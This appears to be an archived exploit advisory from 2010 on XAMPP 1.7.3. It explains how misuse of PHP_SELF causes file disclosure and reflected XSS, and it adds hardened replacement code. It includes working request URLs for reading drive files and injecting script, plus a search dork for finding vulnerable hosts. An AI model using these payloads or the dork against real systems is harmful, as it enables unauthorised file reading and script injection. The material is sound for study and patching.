ID 1337DAY-ID-14686 Type zdt Reporter TheLeader Modified 2010-11-02T00:00:00
Description
Exploit for php platform in category web applications
=======================================
XAMPP <= 1.7.3 multiple vulnerabilities
=======================================
# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: [email protected]
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilities
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
I. File disclosure
XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.
http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
showcode.php:
<?php
    echo '<br><br>';
    if ($_REQUEST['showcode'] != 1) {
        echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
    } else {
        $file = file_get_contents(basename($_SERVER['PHP_SELF']));
        echo "<h2>".$TEXT['global-sourcecode']."</h2>";
        echo "<textarea cols='100' rows='10'>";
        echo htmlspecialchars($file);
        echo "</textarea>";
    }
?>
showcode.php relies on basename($_SERVER['PHP_SELF']) to decide which file to read.
$_SERVER['PHP_SELF'] holds the path of the requested URL, including anything the client appends after the script name.
basename() returns the last element of that path, using "/" as a delimiter.
Traversing the directory tree, though, requires the "/" character that basename() uses as a delimiter.
Therefore directory traversal is not achieved, but it is possible to view the contents of files from any drive and from the XAMPP htdocs directory.
II. Cross Site Scripting
http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP directory rely on $_SERVER['PHP_SELF'] to fill in the "action" attribute of HTML forms.
This can be exploited to perform Cross Site Scripting attacks.
biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
dork: "inurl:xampp/biorhythm.php"
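Added example (not part of the original advisory and not XAMPP's code): the two PHP_SELF patterns from sections I and II next to hardened forms that use the server-set SCRIPT_NAME, an allowlist and attribute escaping. The function names, the allowlist and the sample request values are assumptions constructed for illustration; $server stands in for $_SERVER so the script runs under the PHP CLI.

```php
<?php
// Added example, not XAMPP code. $server stands in for $_SERVER; the request
// values in $requests are constructed to mirror the URL shapes in the advisory.

// showcode.php pattern: PHP_SELF includes client-supplied path info, so the
// name handed to file_get_contents() is chosen by the requester.
function source_target_vulnerable(array $server): string {
    return basename($server['PHP_SELF']);
}

// Hardened: SCRIPT_NAME excludes path info, and the name must appear on an
// allowlist (hypothetical list of demo pages) before any file is read.
function source_target_hardened(array $server, array $allowed): ?string {
    $name = basename($server['SCRIPT_NAME']);
    return in_array($name, $allowed, true) ? $name : null;
}

// showcode.php link pattern: PHP_SELF echoed into an attribute unescaped.
function self_link_vulnerable(array $server): string {
    return '<a href="' . $server['PHP_SELF'] . '?showcode=1">';
}

// Hardened: server-side script name, escaped for an HTML attribute context.
function self_link_hardened(array $server): string {
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<a href="' . $self . '?showcode=1">';
}

$allowed = ['showcode.php', 'phonebook.php', 'biorhythm.php'];
$requests = [
    'plain request' => ['SCRIPT_NAME' => '/xampp/showcode.php',
                        'PHP_SELF'    => '/xampp/showcode.php'],
    'path info names a file' => ['SCRIPT_NAME' => '/xampp/showcode.php',
                        'PHP_SELF'    => '/xampp/showcode.php/c:boot.ini'],
    'path info carries markup' => ['SCRIPT_NAME' => '/xampp/biorhythm.php',
                        'PHP_SELF'    => '/xampp/biorhythm.php/"><b>x</b>'],
];

foreach ($requests as $label => $server) {
    echo "== $label ==\n";
    echo 'file read (vulnerable): ', source_target_vulnerable($server), "\n";
    echo 'file read (hardened):   ', source_target_hardened($server, $allowed) ?? '(rejected)', "\n";
    echo 'link (vulnerable):      ', self_link_vulnerable($server), "\n";
    echo 'link (hardened):        ', self_link_hardened($server), "\n";
}
```

In the hardened output the file name and the link stay fixed at the script's own name regardless of what follows it in the URL.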
# 0day.today [2018-03-09] #